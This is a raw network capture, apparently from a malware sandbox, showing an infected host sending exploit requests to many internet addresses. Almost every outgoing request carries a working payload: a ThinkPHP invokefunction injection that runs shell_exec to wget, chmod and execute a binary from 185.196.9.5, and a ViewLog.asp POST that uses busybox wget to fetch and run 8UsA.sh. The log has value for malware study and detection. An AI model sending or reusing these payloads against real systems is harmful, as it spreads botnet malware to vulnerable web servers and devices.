Feb 25, 2024 19:04:33.946408987 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
857	192.168.2.15	46674	112.186.52.170	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:34.055169106 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:34.343579054 CET	514	IN	HTTP/1.1 302 Found Date: Sun, 25 Feb 2024 18:02:06 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8g DAV/2 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: PHPSESSID=457tlgcakj2k6bosc60s2v8o72; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: http://www.ruvie.co.kr Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
858	192.168.2.15	57558	112.74.33.99	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:34.082276106 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:34.397520065 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Sun, 25 Feb 2024 18:04:34 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
859	192.168.2.15	57776	112.197.182.194	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:34.193592072 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:34.574778080 CET	339	IN	HTTP/1.0 400 Bad Request Date: Mon, 26 Feb 2024 01:04:25 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
860	192.168.2.15	37252	95.138.154.100	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:34.225635052 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:34.395919085 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:04:33 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
861	192.168.2.15	46080	95.164.248.166	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:34.232964993 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:34.411345005 CET	857	IN	HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 25 Feb 2024 18:04:33 GMTContent-Type: text/htmlContent-Length: 612Last-Modified: Sun, 25 Feb 2024 18:04:33 GMTConnection: keep-aliveETag: "433f6d84"Accept-Ranges: bytes<!DOCTYPE html><html><head><title>Welcome to nginx!</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>Welcome to nginx!</h1><p>If you see this page, the nginx web server is successfully installed andworking. Further configuration is required.</p><p>For online documentation and support please refer to<a href="http://nginx.org/">nginx.org</a>.<br/>Commercial support is available at<a href="http://nginx.com/">nginx.com</a>.</p><p><em>Thank you for using nginx.</em></p></body></html> Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
862	192.168.2.15	47084	95.161.180.46	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:34.269884109 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
863	192.168.2.15	45178	95.9.113.143	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:34.307024002 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:34.558495998 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:04:34 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
864	192.168.2.15	50830	31.186.175.166	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:34.394359112 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:34.577811956 CET	633	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:34 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_python/3.5.0- Python/2.7.5 Content-Length: 362 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
865	192.168.2.15	36888	94.253.56.222	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:34.439948082 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:38.629252911 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:38.849925041 CET	324	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 Date: Sun, 25 Feb 2024 18:04:38 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
866	192.168.2.15	46432	31.136.103.63	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:34.627080917 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:37.861258984 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:44.005306005 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:56.037064075 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:21.380786896 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
867	192.168.2.15	38244	94.121.200.169	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:34.663764954 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
868	192.168.2.15	55716	31.132.209.208	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:34.668015003 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:34.893958092 CET	388	IN	HTTP/1.1 404 Not Found Date: Sun, 25 Feb 2024 19:48:56 GMT Server: DNVRS-Webs Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=10, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
869	192.168.2.15	60876	95.86.121.140	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:34.792110920 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
870	192.168.2.15	56548	88.216.5.21	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:35.793325901 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
871	192.168.2.15	55592	95.163.58.32	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:36.221474886 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:36.442058086 CET	601	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.2 Date: Sun, 25 Feb 2024 18:04:36 GMT Content-Type: text/html Content-Length: 173 Connection: close Strict-Transport-Security: max-age=31556926 X-XSS-Protection: 1; mode=block; report=https://cspreport.mail.ru/xxssprotection X-Content-Type-Options: nosniff Content-Security-Policy: report-uri https://cspreport.mail.ru/calendar/; X-Frame-Options: SAMEORIGIN Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
872	192.168.2.15	52404	95.86.98.57	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:36.231805086 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
873	192.168.2.15	48180	95.100.25.241	80

Timestamp	Bytes transferred	Direction	Data
